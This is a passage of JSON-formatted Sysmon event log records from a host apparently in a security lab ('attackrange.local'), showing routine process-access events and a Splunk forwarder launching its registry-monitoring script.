ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.186","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3587,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.186\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.186","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3588,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.186\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.186","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3589,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.186\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.186","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3590,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.186\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.186","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3591,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.186\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.186","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3592,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.186\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-023D-5F25-0000-0010A25F0500}\r\nTargetProcessId: 4840\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.186","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-023D-5F25-0000-0010A25F0500}","TargetProcessId":"4840","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3593,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.297\r\nProcessGuid: {A837DB8D-023D-5F25-0000-001075610500}\r\nProcessId: 4844\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinRegMon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.297","ProcessGuid":"{A837DB8D-023D-5F25-0000-001075610500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinRegMon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3594,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.295\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 4232\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-023D-5F25-0000-001075610500}\r\nTargetProcessId: 4844\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.295","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"4232","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-023D-5F25-0000-001075610500}","TargetProcessId":"4844","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program 